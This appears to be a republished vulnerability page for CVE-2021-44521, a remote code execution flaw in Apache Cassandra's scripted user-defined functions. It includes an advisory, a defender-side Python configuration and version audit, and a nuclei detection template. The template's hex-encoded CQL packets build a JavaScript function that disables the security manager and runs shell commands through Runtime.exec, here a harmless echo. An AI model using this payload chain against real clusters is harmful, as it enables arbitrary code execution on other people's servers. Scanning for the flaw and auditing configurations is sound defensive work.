Apache Cassandra Load UDF RCE

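Vulnerability information

Vulnerability name: Apache Cassandra Load UDF RCE

Vulnerability ID:

  • CVE: CVE-2021-44521

Vulnerability type: Command execution

Severity: Critical

Description: Apache Cassandra is a highly scalable distributed NoSQL database system, widely used in enterprise applications that handle large volumes of data. It supports high availability across multiple data centers and is a key infrastructure component at many large internet companies.

The vulnerability lies in Apache Cassandra's user-defined function (UDF) feature. When the configuration enables user-defined functions (enable_user_defined_functions: true), enables scripted user-defined functions (enable_scripted_user_defined_functions: true), and disables user-defined function threads (enable_user_defined_functions_threads: false), an attacker can execute arbitrary code by creating a malicious user-defined function. This configuration is documented as unsafe, and this CVE further confirms the danger.

An attacker who successfully exploits this vulnerability can execute arbitrary code with the privileges of the Cassandra process, which may lead to complete compromise of the affected system. To exploit it, the attacker needs sufficient permissions to create user-defined functions in the cluster. The vulnerability is severe because it allows remote code execution without user interaction and exploitation can be automated, posing a significant threat to system security.

Vendor: apache

Product: cassandra

Affected versions: 3.0.x < version <= 3.0.26, 3.11.x < version <= 3.11.12, 4.0.x < version <= 4.0.2

Search query: cpe:"cpe:2.3:a:apache:cassandra"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/3442666f0f77cfb9c0212eb8044484062643effd/network%2Fcves%2F2021%2FCVE-2021-44521.yaml

Type: projectdiscovery/nuclei-templates:github issues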
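
A defender-side check for the configuration named in the description, as an added example that is not part of the original page or the nuclei template: it reads the three settings from the text of a cassandra.yaml and compares a version string against the fixed releases given in the template's remediation field. The values assumed when a key is absent, the function names and the sample files are assumptions constructed for this example.

```python
import re

# Settings named in the advisory. Values used when a key is absent are an
# assumption here (stock cassandra.yaml defaults); adjust for your build.
DEFAULTS = {"enable_user_defined_functions": False,
            "enable_scripted_user_defined_functions": False,
            "enable_user_defined_functions_threads": True}
# Fixed release per branch, from the template's remediation field.
FIXED = {(3, 0): (3, 0, 26), (3, 11): (3, 11, 12), (4, 0): (4, 0, 2)}

def read_flags(yaml_text):
    """Read the three top-level booleans; commented or indented lines are skipped."""
    flags = dict(DEFAULTS)
    for line in yaml_text.splitlines():
        m = re.match(r"(\w+)\s*:\s*([^#\s]+)", line)
        if m and m.group(1) in flags:
            flags[m.group(1)] = m.group(2).strip("'\"").lower() == "true"
    return flags

def unsafe_udf_config(flags):
    """True only for the exact combination the description calls unsafe."""
    return (flags["enable_user_defined_functions"]
            and flags["enable_scripted_user_defined_functions"]
            and not flags["enable_user_defined_functions_threads"])

def is_patched(version):
    """True/False on the branches listed in FIXED, None for any other branch."""
    parts = tuple(int(p) for p in re.findall(r"\d+", version)[:3])
    fixed = FIXED.get(parts[:2])
    return None if fixed is None else parts >= fixed

def audit(yaml_text, version):
    flags = read_flags(yaml_text)
    return {"unsafe_config": unsafe_udf_config(flags),
            "patched": is_patched(version), "flags": flags}

# Constructed sample files, not taken from any real cluster.
SAMPLE_UNSAFE = """\
enable_user_defined_functions: true
enable_scripted_user_defined_functions: true
enable_user_defined_functions_threads: false
"""
SAMPLE_STOCK = """\
# enable_user_defined_functions: true
enable_user_defined_functions: false
"""

if __name__ == "__main__":
    print(audit(SAMPLE_UNSAFE, "3.11.11"))
    print(audit(SAMPLE_STOCK, "4.0.2"))
```

The template's description states that this configuration remains unsafe after the fix, so `unsafe_config` is worth reporting even when `patched` is true.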

POC details


id: CVE-2021-44521

info:
  name: Apache Cassandra Load UDF RCE
  author: Y4er, NaN-KoreLogic
  severity: critical
  description: 'When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.'
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code with the privileges of the Cassandra process, potentially leading to a complete compromise of the affected system.
  remediation: 3.0.x users should upgrade to 3.0.26, 3.11.x users should upgrade to 3.11.12, 4.0.x users should upgrade to 4.0.2
  reference:
    - https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44521
    - https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/
    - https://lists.apache.org/thread/y4nb9s4co34j8hdfmrshyl09lokm7356
    - http://www.openwall.com/lists/oss-security/2022/02/11/4
    - https://thesecmaster.com/how-to-fix-apache-cassandra-rce-vulnerability-cve-2021-44521/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.1
    cve-id: CVE-2021-44521
    cwe-id: CWE-732,CWE-94
    epss-score: 0.91865
    epss-percentile: 0.99680
    cpe: cpe:2.3:a:apache:cassandra:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: apache
    product: cassandra
    shodan-query: cpe:"cpe:2.3:a:apache:cassandra"
  tags: cve,cve2021,network,rce,apache,cassandra,tcp
tcp:
  - host:
      - "{{Hostname}}"
      - "{{Host}}:{{Port}}"
    inputs:
      - data: "050000000500000000"
        type: hex
        read: 1024

      - data: "0500000101000000530003000b4452495645525f4e414d450016446174615374617820507974686f6e20447269766572000e4452495645525f56455253494f4e0006332e32352e30000b43514c5f56455253494f4e0005332e342e35"
        type: hex
        read: 1024

      - data: "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a"
        type: hex
        read: 1024

      - data: "7f0002a6a69f0500000407000000760000005e435245415445204b4559535041434520746573742057495448207265706c69636174696f6e203d207b27636c617373273a202753696d706c655374726174656779272c20277265706c69636174696f6e5f666163746f7227203a20317d3b0001000000340000006400080005d82cc8ca390f0ddce06b"
        type: hex
        read: 1024

      - data: "7d000296664f0500000807000000740000005c435245415445205441424c4520746573742e7263652028636d642076617263686172205052494d415259204b455929205749544820636f6d6d656e743d27496d706f7274616e742062696f6c6f676963616c207265636f726473273b0001000000340000006400080005d82cc8cb2fc161951510"
        type: hex
        read: 1024

      - data: "1c030291ff34050000100700000313000002fb637265617465206f72207265706c6163652046554e4354494f4e20746573742e657865632820636d64207465787420290d0a2020202052455455524e53204e554c4c204f4e204e554c4c20494e5055540d0a2020202052455455524e5320746578740d0a202020204c414e4755414745206a6176617363726970740d0a2020202041532024240d0a202020207661722053797374656d203d204a6176612e7479706528226a6176612e6c616e672e53797374656d22293b53797374656d2e73657453656375726974794d616e61676572286e756c6c293b0d0a202020207661722065203d746869732e656e67696e652e666163746f72792e736372697074456e67696e652e6576616c2827766172206f736e616d65203d206a6176612e6c616e672e53797374656d2e67657450726f706572747928226f732e6e616d6522293b6f736e616d65203d206f736e616d652e746f4c6f7765724361736528293b7661722073706c6974203d206f736e616d652e73746172747357697468282277696e2229203f20222f6322203a20222d63223b76617220636d6450617468203d206f736e616d652e73746172747357697468282277696e2229203f2022636d6422203a202262617368223b76617220636f6d6d616e64203d2022272b636d642b27223b7661722073203d205b636d64506174682c2073706c69742c20636f6d6d616e645d3b70203d206a6176612e6c616e672e52756e74696d652e67657452756e74696d6528292e657865632873293b766172206272203d206e6577206a6176612e696f2e4275666665726564526561646572286e6577206a6176612e696f2e496e70757453747265616d52656164657228702e676574496e70757453747265616d282929293b766172207265733d22223b7768696c652028286c203d2062722e726561644c696e6528292920213d206e756c6c29207b202020207265732b3d6c3b7265732b3d6a6176612e6c616e672e53797374656d2e6c696e65536570617261746f7228293b7d27293b0d0a20202020653b0d0a2020202024243b0001000000340000006400080005d82cc8cc7ece89646c85"
        type: hex
        read: 1024

      - data: "51000278033505000014070000004800000030696e7365727420696e746f20746573742e72636528636d64292076616c75657328276563686f2031323331323327293b0001000000340000006400080005d82cc8cd5b810ef0b16e"
        type: hex
        read: 1024

      - data: "450002bff1d805000015070000003c0000002473656c65637420746573742e6578656328636d64292066726f6d20746573742e7263653b0001000000340000006400080005d82cc8cd99d444271281"
        type: hex
        read: 1024

      - data: "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a"
        type: hex
        read: 1024
    matchers:
      - type: word
        part: raw
        words:
          - "123123"
# digest: 4a0a00473045022100d0837ea19e76ae9fbddc08aea0ca103b39a3a004d0187d46bd75cc9f605c75fd022040ec326b0cfefa5b5ac2b13274061045378dc958a1eaf77b97aa3b57a4456a75:922c64590222798bb761d5b6d8e72950


Apache Cassandra Load UDF RCE
http://example.com/2025/07/06/github_2193064422/
Author: lianccc
Published: July 6, 2025